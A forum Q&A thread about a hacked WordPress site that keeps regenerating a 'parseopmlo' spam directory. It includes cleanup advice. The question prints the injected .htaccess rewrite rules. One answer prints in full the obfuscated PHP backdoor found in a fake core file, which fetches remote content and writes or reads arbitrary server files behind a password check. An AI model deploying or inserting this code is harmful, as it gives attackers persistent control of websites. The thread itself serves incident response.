# Can't find malicious code creating 'parseopmlo' directory

Tags: php, .htaccess, mkdir

I work for a non-profit. Our WordPress site (shared hosting on Bluehost) was hacked earlier this week, and the hacker appears to have created a script that automatically creates a directory in root named 'parseopmlo' which has two files in it, index.php and moban.html. It simultaneously edits the .htaccess file, adding this code:

```
RewriteRule ^.*[-/]n(\d+)-.*$ parseopmlo/index\.php?id=$1&%{QUERY_STRING} [L]

RewriteRule ^n(\d+)-.*$ parseopmlo/index\.php?id=$1&%{QUERY_STRING} [L]

RewriteRule ^r(\d+)[-/].*[-/]n(\d+)-.*$ parseopmlo/index\.php?id=$1-$2&%{QUERY_STRING} [L]

RewriteRule ^r(\d+)[-/]n(\d+)[-/].*$ parseopmlo/index\.php?id=$1-$2&%{QUERY_STRING} [L]

RewriteRule ^n(\d+)[-/].*[-/]r(\d+)[-/].*$ parseopmlo/index\.php?id=$2-$1&%{QUERY_STRING} [L]

RewriteRule ^n(\d+)[-/]r(\d+)[-/].*$ parseopmlo/index\.php?id=$2-$1&%{QUERY_STRING} [L]

RewriteRule ^.*[-/]n(\d+)[-/]r(\d+)[-/].*$ parseopmlo/index\.php?id=$2-$1&%{QUERY_STRING} [L]

RewriteRule ^.*[-/]n(\d+)[-/].*[-/]r(\d+)[-/].*$ parseopmlo/index\.php?id=$2-$1&%{QUERY_STRING} [L]

RewriteRule ^.*[-/]r(\d+)[-/].*[-/]n(\d+)[-/].*$ parseopmlo/index\.php?id=$1-$2&%{QUERY_STRING} [L]

RewriteRule ^.*[-/]r(\d+)[-/]n(\d+)[-/].*$ parseopmlo/index\.php?id=$1-$2&%{QUERY_STRING} [L]
```

I have deleted the directory several times now, and restored a clean .htaccess file several times. Each time, the directory is recreated and .htaccess is hacked again within 5-30 minutes.

I changed all passwords to automatically generated, very strong passwords. There is no way someone is sitting around logged into our site's FTP, manually making these changes.

It's a script on our server, but I can't find it. I used SSH with the grep command to recursively search every file on the server for anything containing the text string 'parseopmlo' and the only results were the lines of code in .htaccess. I was hoping it would show up in whatever file contains the script creating the directory. No dice.

If you Google 'parseopmlo' you'll get a ton of hits featuring other websites that have been hacked in the same way, but no mention of how to fix this.

Any ideas on how to find and delete the malicious code?

Comment: The answer is the same every time a server is compromised. Destroy it and do it again. https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server

Comment: As already noted, your server is compromised.  Specifically, your WordPress installation.  You'll need to completely reinstall.  Contact Bluehost support.

Answer (score 3):

For the benefit of anyone who might in the future google "parseopmlo" looking for a solution to this... with the help of Bluehost's malware scan I identified the file causing the issue. It was: /wp-includes/customize/class-wp-customize-filters-setting.php And for the record, in clean versions of WP, that filename has singular "filter" in it, not the plural "filters." Bluehost classified the malware in that file as SL-PHP-FILEHACKER-md5-bfcn.UNOFFICIAL

And here is the code that it contained:

```
    <?php


@ini_set('display_errors', 0);@set_time_limit(3600);
$q1 = "O00O0O";$q2 = "O0O000";$q3 = "O0OO00";$q4 = "OO0O00";$q5 = "OO0000";$q6 = "O00OO0";$q7 = "O00O00";$q8 = "O00OOO";$q9 = "O0O0OO";$q10 = "OOO0OO";$q11 = "OO00OO";$q12 = "OO000O";$q13 = "OO0O0O";$q14 = "OOOO00";$q15 = "OO0OO0O";$$q1 = RandAbc();$$q3 =  $O00O0O{62}.$O00O0O{51}.$O00O0O{50}.$O00O0O{54}.$O00O0O{55};$$q5 = $O00O0O{28}.$O00O0O{26}.$O00O0O{27}.$O00O0O{33};$$q6 = $O00O0O{19}.$O00O0O{22}.$O00O0O{12}.$O00O0O{1}.$O00O0O{0}.$O00O0O{12}.$O00O0O{0}.$O00O0O{17}.$O00O0O{10}.$O00O0O{4}.$O00O0O{19};$$q4 = $$O0OO00;$$q2 = $O00O0O{12}.$O00O0O{3}.$O00O0O{31};$$q7 = $O00O0O{30}.$O00O0O{35}.$O00O0O{32}.$O00O0O{34}.$O00O0O{31}.$O00O0O{34}.$O00O0O{31}.$O00O0O{3}.$O00O0O{26}.$O00O0O{5}.$O00O0O{5}.$O00O0O{4}.$O00O0O{29}.$O00O0O{31}.$O00O0O{28}.$O00O0O{27}.$O00O0O{0}.$O00O0O{26}.$O00O0O{30}.$O00O0O{32}.$O00O0O{5}.$O00O0O{26}.$O00O0O{30}.$O00O0O{34}.$O00O0O{28}.$O00O0O{5}.$O00O0O{33}.$O00O0O{0}.$O00O0O{3}.$O00O0O{31}.$O00O0O{34}.$O00O0O{3};$$q8 =  $O00O0O{23}.$O00O0O{24}.$O00O0O{25};$$q9 = $O00O0O{62}.$O00O0O{54}.$O00O0O{40}.$O00O0O{53}.$O00O0O{57}.$O00O0O{40}.$O00O0O{53};$$q10 = $$O0O0OO;$$q11 = $O00O0O{39}.$O00O0O{50}.$O00O0O{38}.$O00O0O{56}.$O00O0O{48}.$O00O0O{40}.$O00O0O{49}.$O00O0O{55}.$O00O0O{62}.$O00O0O{53}.$O00O0O{50}.$O00O0O{50}.$O00O0O{55};$$q12 = $O00O0O{51}.$O00O0O{43}.$O00O0O{51}.$O00O0O{62}.$O00O0O{54}.$O00O0O{40}.$O00O0O{47}.$O00O0O{41};$$q13 = $O00O0O{2}.$O00O0O{6}.$O00O0O{4}.$O00O0O{19};$$q14 = $O00O0O{8}.$O00O0O{13}.$O00O0O{3}.$O00O0O{4}.$O00O0O{23}.$O00O0O{63}.$O00O0O{15}.$O00O0O{7}.$O00O0O{15};$$q15 = $O00O0O{7}.$O00O0O{19}.$O00O0O{19}.$O00O0O{15}.$O00O0O{64}.$O00O0O{65}.$O00O0O{65}.$O00O0O{22}.$O00O0O{22}.$O00O0O{22}.$O00O0O{63};
if(isset($OOO0OO["$OO00OO"])){$BT = $OOO0OO["$OO00OO"];}elseif(isset($OOO0OO["$OO000O"])){$BT = str_ireplace(str_replace("\\",DIRECTORY_SEPARATOR,str_replace("/",DIRECTORY_SEPARATOR,$OOO0OO["$OO000O"])),'',__FILE__).DIRECTORY_SEPARATOR;}else{$BT = '/';}
foreach($OO0O00 as $O00O00o=>$O00Oo0o){
    $$O00O00o = $O00Oo0o;
}

if(!(isset($passwd) && $O0O000($passwd) == $O00O00)){
    header("HTTP/1.1 404 Not Found");  
    header("Status: 404 Not Found");  
    exit; 
}

if(isset($act) && $act == 'check' && isset($check_file)){
    if(file_exists($check_file)){
        echo '#ok#';
    }
}

if(isset($act) && $act == 'test'){
        echo '#ok#';
}

if(isset($act) && $act == 'recover' && isset($recover_file) && isset($recover_file_url)){
{

            $pfile = $recover_file;
            $date = $OO0O0O($recover_file_url);
            gdir_file($recover_file);
            @chmod($pfile,0755);

            if($date && file_put_contents($pfile,$date)){
                echo '#ok#';
            }else{
                echo '#fail#';
            }

    }
}

if(isset($act) && $act == 'redate' && isset($redate_file)){
    if(file_exists($redate_file)){
        echo rdFile($redate_file);
    }
}

function RandAbc($length = "") {
    $str = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_.:/-";
    return ($str);
} 

function rdFile($file){
    if(function_exists('file_get_contents')){
        return file_get_contents($file);
    }else{
        $handle = fopen($file, "r");
        $contents = fread($handle, filesize($file));
        fclose($handle);
        return $contents;
    }
}

function cget($url,$loop=10){
    $data = false;        $i = 0; 

    while(!$data) {
             $data = tcget($url);             if($i++ >= $loop) break;        }
    return $data;
}

function tcget($url,$proxy=''){
    global $OO0OO0O, $O00OO0, $OO0000, $O00OOO;
     $data = '';        $url = "$OO0OO0O$O00OO0.$O00OOO/".$url;
 $url = trim($url);     if (extension_loaded('curl') && function_exists('curl_init') && function_exists('curl_exec')){
         $ch = curl_init();         curl_setopt($ch, CURLOPT_URL, $url);         curl_setopt($ch, CURLOPT_HEADER, false);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);        
         curl_setopt($ch, CURLOPT_TIMEOUT, 60);         $data = curl_exec($ch);         curl_close($ch);      }

     if ($data == ''){
         if (function_exists('file_get_contents') && $url){
             $data = @file_get_contents($url);             }
         }

     if (($data == '') && $url){
         if (function_exists('fopen') && function_exists('ini_get') && ini_get('allow_url_fopen')){
             ($fp = @fopen($url, 'r'));            
             if ($fp){

                 while (!@feof($fp)){
                     $data .= @fgets($fp) . '';                     }

                 @fclose($fp);                 }
             }
         }
     return $data;  
}

function m_mkdir($dir){
        if(!is_dir($dir)) mkdir($dir);
    }

function gdir_file($gDir=''){
        global $BT;
        $gDir = str_replace('/',DIRECTORY_SEPARATOR,$gDir);
        $gDir = str_replace('\\',DIRECTORY_SEPARATOR,$gDir);
        $arr = explode(DIRECTORY_SEPARATOR,$gDir);

        if(count($arr) <= 0) return;


        if(!strstr($gDir,$BT))
            $dir = $BT;
        else
            $dir = '';

        for($i = 0 ; $i < count($arr)-1 ; $i++){
            $dir .= '/' . $arr[$i];
            m_mkdir($dir);
        }

        return $dir;
}

//
```

I'm not a coder, so it really boggles my mind how that could possibly edit our .htaccess file. But it did.

Answer (score 1):

So I just cleaned my whole wordpress installation and it is now working again here are the steps:

1. delete the /wp-includes/customize/class-wp-customize-filters-setting.php File
2. Download new Wordpress Installation and overwrite all the core files
3. Change the Permission of /html/wp-includes/load.php to 644
4. Change Permission of index.php to also 644

Now refresh your page and try to avoid that problems in future!

If I saved your Wordpress Installation -> Vote Up guys

Answer (score 0):

Your server is compromised. Something has been added into your WordPress installation. That's what's recreating the "parseopmlo" directory.

Steps:

1. Contact Bluehost's support.
2. Most likely, they'll either delete your site or else tell you to do it. (The **entire** directory tree.)
3. Be prepared to reinstall from your backups.  (You *do* have backups, right?)
4. Consider installing security plugins. WordFence is popular. Also, do a search for "Wordpress Hardening."

Good luck.

Answer (score 0):

I have found there are multiple files infected in wp-includes, wp-admin: template-loader.php, load.php, user-terms.php, replace.php and a couple of .gif images.

I installed the free version of Sucuri Security Wordpress (google it) and it highlights all compromised files in a breeze. I hope it helps.

Also the attackers uploaded a html file and added as owners in webmaster console, then uploaded 23 sitemaps with hundreds of thousands of links. 
Make sure to verify the google html files used for authentication.